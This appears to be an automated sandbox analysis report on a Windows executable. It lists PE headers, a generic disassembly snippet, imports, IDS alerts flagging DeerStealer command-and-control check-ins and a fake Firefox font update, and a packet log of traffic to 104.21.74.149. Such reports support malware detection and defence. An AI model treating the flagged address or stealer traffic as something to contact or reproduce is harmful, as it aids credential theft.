OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	d7e2fd259780271687ffca462b9e69b7

Entrypoint Preview

Instruction
call 00007FEAFD01186Fh
jmp 00007FEAFD0111E3h
mov eax, dword ptr [esp+08h]
mov ecx, dword ptr [esp+10h]
or ecx, eax
mov ecx, dword ptr [esp+0Ch]
jne 00007FEAFD01135Bh
mov eax, dword ptr [esp+04h]
mul ecx
retn 0010h
push ebx
mul ecx
mov ebx, eax
mov eax, dword ptr [esp+08h]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, dword ptr [esp+08h]
mul ecx
add edx, ebx
pop ebx
retn 0010h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
cmp cl, 00000040h
jnc 00007FEAFD011367h
cmp cl, 00000020h
jnc 00007FEAFD011358h
shrd eax, edx, cl
shr edx, cl
ret
mov eax, edx
xor edx, edx
and cl, 0000001Fh
shr eax, cl
ret
xor eax, eax
xor edx, edx
ret
push ebp
mov ebp, esp
jmp 00007FEAFD01135Fh
push dword ptr [ebp+08h]
call 00007FEAFD017BDCh
pop ecx
test eax, eax
je 00007FEAFD011361h
push dword ptr [ebp+08h]
call 00007FEAFD017C65h
pop ecx
test eax, eax
je 00007FEAFD011338h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007FEAFD011BF4h
jmp 00007FEAFD011BD1h
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007FEAFD011C0Dh
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
test byte ptr [ebp+08h], 00000001h
push esi
mov esi, ecx
mov dword ptr [esi], 00460DB8h
je 00007FEAFD01135Ch
push 0000000Ch
push esi
call 00007FEAFD01132Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x686b4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d000	0x3a1c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x3dfc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x67650	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x676a4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x67030	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4b000	0x3e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x68234	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x49937	0x49a00	2319c0baa707bb66cc0bc08c55a13d8c	False	0.5314688561120543	data	6.570006046413636	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4b000	0x1ed60	0x1ee00	8ad6c4e18165c6d8ccdc97bab683438d	False	0.3136386639676113	data	5.114228301263695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6a000	0x1730	0xa00	00fde973df27dc2d36084e16d6dddbdf	False	0.274609375	firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a14600	3.1526594027632213	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn	0x6c000	0x38	0x200	e7bead862cfee80a482437c71d2b810b	False	0.107421875	data	0.5813091016060967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x6d000	0x3a1c	0x3c00	f4cb55c2c31547267bc5ffbceb1fc875	False	0.330078125	data	5.551561897032273	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x3dfc	0x3e00	dd2c47fa48872886af4c9a2e5bd90ccc	False	0.8097278225806451	data	6.794335469567533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x6d178	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.43185920577617326
RT_MESSAGETABLE	0x6da20	0x2840	data	English	United States	0.28823757763975155
RT_GROUP_ICON	0x70260	0x14	data	English	United States	1.15
RT_VERSION	0x70274	0x2d4	data	English	United States	0.47513812154696133
RT_MANIFEST	0x70548	0x4d2	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators	English	United States	0.47568881685575365

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
USER32.dll	PeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
GDI32.dll	DeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
ole32.dll	CoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
KERNEL32.dll	GetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
RPCRT4.dll	UuidCreate

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-02T07:25:07.938694+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49835	104.21.74.149	443	TCP
2024-12-02T07:25:08.819899+0100	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.6	49835	104.21.74.149	443	TCP
2024-12-02T07:25:10.586588+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49841	104.21.74.149	443	TCP
2024-12-02T07:25:12.752590+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49847	104.21.74.149	443	TCP
2024-12-02T07:25:16.527693+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49856	104.21.74.149	443	TCP
2024-12-02T07:25:19.200016+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49861	104.21.74.149	443	TCP
2024-12-02T07:25:21.101889+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49866	104.21.74.149	443	TCP
2024-12-02T07:25:23.104693+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49872	104.21.74.149	443	TCP
2024-12-02T07:25:25.059446+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49877	104.21.74.149	443	TCP
2024-12-02T07:25:27.072842+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49883	104.21.74.149	443	TCP
2024-12-02T07:25:29.464751+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49889	104.21.74.149	443	TCP
2024-12-02T07:26:10.090177+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49981	104.21.74.149	443	TCP
2024-12-02T07:26:10.993284+0100	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.6	49981	104.21.74.149	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 07:25:06.673584938 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:06.673619986 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:06.673743963 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:06.674745083 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:06.674757957 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:07.938601971 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:07.938694000 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:07.990214109 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:07.990233898 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:07.990454912 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.042041063 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.129585028 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.129621029 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.129677057 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.819912910 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.819955111 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.819994926 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.820023060 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.820039034 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.820050001 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.820060968 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.820207119 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.820207119 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.828674078 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.836882114 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.836913109 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.836939096 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.836950064 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.836993933 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.844793081 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.853228092 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.853291035 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.853303909 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.895803928 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:08.939815998 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:08.989635944 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.020915031 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.026144028 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.026189089 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.026202917 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.034091949 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.034147978 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.034159899 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.041968107 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.045205116 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.045217991 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.049751997 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.049802065 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.049813986 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.065335035 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.065422058 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.065466881 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.065479040 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.065520048 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.073149920 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.080952883 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.081003904 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.081012011 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.088825941 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.088879108 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.088891029 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.096718073 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.099461079 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.099487066 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.104446888 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.104499102 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.104507923 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.145785093 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.145795107 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.146475077 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.146532059 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.146539927 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.192764044 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.192771912 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.223385096 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.223532915 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.223715067 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.223727942 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.223767996 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.233027935 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.233035088 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.233092070 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.242295980 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.242302895 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.242371082 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.242381096 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.242393970 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.242430925 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.242511034 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.242527008 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.242537975 CET	49835	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.242543936 CET	443	49835	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.322139978 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.322154045 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:09.322226048 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.322525024 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:09.322532892 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:10.586503983 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:10.586587906 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:10.784837961 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:10.784853935 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:10.785085917 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:10.786065102 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:10.786096096 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:10.786099911 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:11.408376932 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:11.408449888 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:11.408620119 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:11.408830881 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:11.408837080 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:11.408865929 CET	49841	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:11.408869982 CET	443	49841	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:11.471301079 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:11.471328020 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:11.471445084 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:11.471715927 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:11.471725941 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:12.752511024 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:12.752589941 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:12.753714085 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:12.753719091 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:12.753915071 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:12.754683971 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:12.754712105 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:12.754715919 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:13.530245066 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:13.530292034 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:13.530339003 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:13.530596018 CET	49847	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:13.530603886 CET	443	49847	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:15.268649101 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:15.268676043 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:15.268748999 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:15.269117117 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:15.269129992 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:16.527620077 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:16.527693033 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:16.528887987 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:16.528892994 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:16.529088974 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:16.529848099 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:16.530078888 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:16.530107021 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:16.530205965 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:16.530240059 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:16.530369043 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:16.530405998 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:16.530548096 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:16.530575991 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:16.530622959 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:16.530627966 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:17.916817904 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:17.916867971 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:17.916920900 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:17.917013884 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:17.917026997 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:17.917045116 CET	49856	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:17.917051077 CET	443	49856	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:17.942037106 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:17.942066908 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:17.942122936 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:17.942394018 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:17.942409039 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.199883938 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.200016022 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.201380014 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.201386929 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.201657057 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.202429056 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.202451944 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.202459097 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.825237036 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.825434923 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.825603008 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.825618982 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.825644016 CET	443	49861	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.825735092 CET	49861	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.843642950 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.843671083 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:19.843744040 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.843982935 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:19.843996048 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.101797104 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.101888895 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.103166103 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.103173018 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.103452921 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.104098082 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.104131937 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.104136944 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.758325100 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.758388042 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.758440971 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.758625984 CET	49866	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.758635044 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.758647919 CET	49866	443	192.168.2.6	104.21.74.149
